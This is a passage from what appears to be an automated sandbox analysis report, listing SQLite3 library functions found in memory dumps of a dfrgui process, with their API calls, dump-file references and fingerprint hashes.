                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E1499A), ref: 61E148EF
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E1499A), ref: 61E14916
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1477753154-0
                                                                                              • Opcode ID: 259db5889659de2d2c308670a2c4fa89ebd14ca763fcc91cb4c1c85057c26422
                                                                                              • Instruction ID: 98b3974ddeb9be72d564ac681d9998bea179d934b70f7bf183d7b58a7ea06e2a
                                                                                              • Opcode Fuzzy Hash: 259db5889659de2d2c308670a2c4fa89ebd14ca763fcc91cb4c1c85057c26422
                                                                                              • Instruction Fuzzy Hash: 1F117CB0A58E528FDB00AFAAC0D165D77F4EB8A30CB25843EE944CB304D734D895CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E27FF9 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_stricmpsqlite3_value_text
                                                                                              • String ID:
                                                                                              • API String ID: 3779612131-0
                                                                                              • Opcode ID: 4b7560af78cbf8a3319734162f80bf5957b3f4f0bbf9a95336c2f020651f58a1
                                                                                              • Instruction ID: 47228baa062e787dc95852d9032b453ba7d0c7ff1f67cb2aa64f7e0ec53a6115
                                                                                              • Opcode Fuzzy Hash: 4b7560af78cbf8a3319734162f80bf5957b3f4f0bbf9a95336c2f020651f58a1
                                                                                              • Instruction Fuzzy Hash: C3115175A047499BD700AF69C885A8EBBA0FB85334F64CA2DF9648B380D335D5518F81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E283D3 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E2837B
                                                                                              • sqlite3_value_text16le.SQLITE3 ref: 61E28393
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E283A2
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E283BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_textsqlite3_value_text16le
                                                                                              • String ID:
                                                                                              • API String ID: 1617396527-0
                                                                                              • Opcode ID: 18a11f3dcb1498ff2aea97aa18ca472c20c8bc7996fc5f0300641e320d2d0473
                                                                                              • Instruction ID: 6af4fa79bcf1b52e72f471ab3fa4c4bf4bbd7ee3a269bc3543763537b059e9b2
                                                                                              • Opcode Fuzzy Hash: 18a11f3dcb1498ff2aea97aa18ca472c20c8bc7996fc5f0300641e320d2d0473
                                                                                              • Instruction Fuzzy Hash: 98118F74A447058FC704DF69C8D0F6EBBE5AB89214F25C43ED8598B360D738E482DB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E25D82 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_bytes$memmovesqlite3_aggregate_context
                                                                                              • String ID:
                                                                                              • API String ID: 1185593704-0
                                                                                              • Opcode ID: f802bc984e00e7a015f1f2915b05754100339f99a3d50a0d2c2ae44e8932936e
                                                                                              • Instruction ID: a2f55cf1af3e075487e02f3776a0ea5d06037b5279dd927072b647da4c3d66c2
                                                                                              • Opcode Fuzzy Hash: f802bc984e00e7a015f1f2915b05754100339f99a3d50a0d2c2ae44e8932936e
                                                                                              • Instruction Fuzzy Hash: 631151716043458FDB04DF68CA9874ABBE4FF85318F15C86DE8888B309E774D855CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3B6F2 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3B70A
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3B732
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3B743
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_create_function_v2.SQLITE3 ref: 61E3B788
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_create_function_v2sqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_mutex_leavesqlite3_vmprintf
                                                                                              • String ID:
                                                                                              • API String ID: 946922136-0
                                                                                              • Opcode ID: 65c71662b4594ba616edb3bd8505c6b9ffea93db2f597e5e2bfef5ec459412c3
                                                                                              • Instruction ID: 9b1fcf6078e1543df84834b03562bddee35c51883163b1aa263a5591b884d7f1
                                                                                              • Opcode Fuzzy Hash: 65c71662b4594ba616edb3bd8505c6b9ffea93db2f597e5e2bfef5ec459412c3
                                                                                              • Instruction Fuzzy Hash: 2B1115B4A087169BD7009F69C48135ABBE5EFC4358F24C82EE8888B340D779D9468B92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3D9F2 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3DA44
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3DA5E
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3DA66
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3DA70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                              • String ID:
                                                                                              • API String ID: 3282944778-0
                                                                                              • Opcode ID: c9d0a8279b0fb6d10f9e88e8124fd5b7dcd7021539c717121c1d728819c928c7
                                                                                              • Instruction ID: 9276bc9ff7edeea20d4d8603c27d464a7db3b48ee85314ebcbb52e7a01ab52b9
                                                                                              • Opcode Fuzzy Hash: c9d0a8279b0fb6d10f9e88e8124fd5b7dcd7021539c717121c1d728819c928c7
                                                                                              • Instruction Fuzzy Hash: 0B0161B4D083569AD7109FA5C54065EFBF4BFC4368F24C92DD8A887340E738C582CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E92415 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E92421
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E9243B
                                                                                              • sqlite3_realloc64.SQLITE3 ref: 61E92470
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E92498
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                                                                              • String ID:
                                                                                              • API String ID: 1177761455-0
                                                                                              • Opcode ID: 262aae676e64ef39d73fc9681c8c0a99e9b2db7323ee6721a11ee9490caddcd8
                                                                                              • Instruction ID: 600d10899b22b097efbaf2c478a74df7be6fbb1c66e02aa89fb4a824cfdc99cd
                                                                                              • Opcode Fuzzy Hash: 262aae676e64ef39d73fc9681c8c0a99e9b2db7323ee6721a11ee9490caddcd8
                                                                                              • Instruction Fuzzy Hash: C3019A74648B428BDB10AF79C88471ABBF4FB8A748F24887CC588CB300E771D8418791
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3D2D7 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_vmprintf.SQLITE3 ref: 61E3D2F8
                                                                                                • Part of subcall function 61E38ACB: sqlite3_initialize.SQLITE3 ref: 61E38AD2
                                                                                                • Part of subcall function 61E38ACB: sqlite3_str_vappendf.SQLITE3 ref: 61E38B1D
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3D322
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D32D
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_initializesqlite3_mprintfsqlite3_str_vappendfsqlite3_vmprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3342067426-0
                                                                                              • Opcode ID: 07e5b18904b5d9ccb0728645222c3b366c9ea9ada50209f98aeb96753600a031
                                                                                              • Instruction ID: a16d80c3e7785ae92544863e38b0ac3845678f14062f8dfa7d7a998e82dbeda9
                                                                                              • Opcode Fuzzy Hash: 07e5b18904b5d9ccb0728645222c3b366c9ea9ada50209f98aeb96753600a031
                                                                                              • Instruction Fuzzy Hash: D801DEB4A0835A9FD7409FBAD48465ABBF4FF88754F60882DD998C7300E734D851CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E23C4D Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 3222608360-0
                                                                                              • Opcode ID: c671133aafb9068747cc4f67c3a9b708aaf11b571ed89a7cae954d0dfdb03e81
                                                                                              • Instruction ID: 0d5c316279a9773f5cba45c3f31516ab3692081abff3a4de9372598d1c346589
                                                                                              • Opcode Fuzzy Hash: c671133aafb9068747cc4f67c3a9b708aaf11b571ed89a7cae954d0dfdb03e81
                                                                                              • Instruction Fuzzy Hash: 2C014875604A168FCB00EFAAD4C4909BBF4FF89758B258558E8888F305D330E955CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E0A9E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_free.SQLITE3 ref: 61E0AA1B
                                                                                                • Part of subcall function 61E0A822: sqlite3_free.SQLITE3 ref: 61E0A843
                                                                                              • sqlite3_free.SQLITE3 ref: 61E0AA2E
                                                                                              • sqlite3_free.SQLITE3 ref: 61E0AA10
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_free.SQLITE3 ref: 61E0AA54
                                                                                                • Part of subcall function 61E0A9B9: sqlite3_free.SQLITE3 ref: 61E0A9CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                              • String ID:
                                                                                              • API String ID: 3930042888-0
                                                                                              • Opcode ID: 29e8ae0f5494ab8a612f1f888ab6182f37c100db74b13a36ff71eb97d14f9ccf
                                                                                              • Instruction ID: 63bb81a0b3bf419812974592d8d68a6bc13e891150b75ca65fb92ffdaf69361f
                                                                                              • Opcode Fuzzy Hash: 29e8ae0f5494ab8a612f1f888ab6182f37c100db74b13a36ff71eb97d14f9ccf
                                                                                              • Instruction Fuzzy Hash: 2C018F70A40649CBCB00AFBAE8C495EF7F4EFC4309F65846ED4908B310E734D8658B51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1E16C Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1E181
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E1E1B1
                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E1E1C7
                                                                                              • sqlite3_result_int64.SQLITE3 ref: 61E1E1DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                                                              • String ID:
                                                                                              • API String ID: 3779139978-0
                                                                                              • Opcode ID: 9fd566f74b89c6b7f66afdcaae551186080e3c881e0ed872417969cce73c24b4
                                                                                              • Instruction ID: 8ce6a14b360728900a64be2fd74fc915e35977c0f6e50b979a7a8bc465938bc6
                                                                                              • Opcode Fuzzy Hash: 9fd566f74b89c6b7f66afdcaae551186080e3c881e0ed872417969cce73c24b4
                                                                                              • Instruction Fuzzy Hash: 1A0148B094CB419EE702AF65C486759BEE0BB85358F21C9AEF4884B7A5C330C580CB83
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E19456 Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E19464
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E1947C
                                                                                              • strcmp.MSVCRT ref: 61E19499
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E194AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2933023327-0
                                                                                              • Opcode ID: 672cd1814eecb2aec6213f77f78a4125dc90f82447f629333bdd84b2e913c48b
                                                                                              • Instruction ID: 3cde259a22742c9f1054c46a89e64281fb61f7826fdbc0f9e1846f8eddd38994
                                                                                              • Opcode Fuzzy Hash: 672cd1814eecb2aec6213f77f78a4125dc90f82447f629333bdd84b2e913c48b
                                                                                              • Instruction Fuzzy Hash: B3F09071A4C7A14BD710AFE984C1A1ABBA8AB8176CF29843DE9488F305D731D81087A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3C1B7 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_vmprintf.SQLITE3 ref: 61E3C1D0
                                                                                                • Part of subcall function 61E38ACB: sqlite3_initialize.SQLITE3 ref: 61E38AD2
                                                                                                • Part of subcall function 61E38ACB: sqlite3_str_vappendf.SQLITE3 ref: 61E38B1D
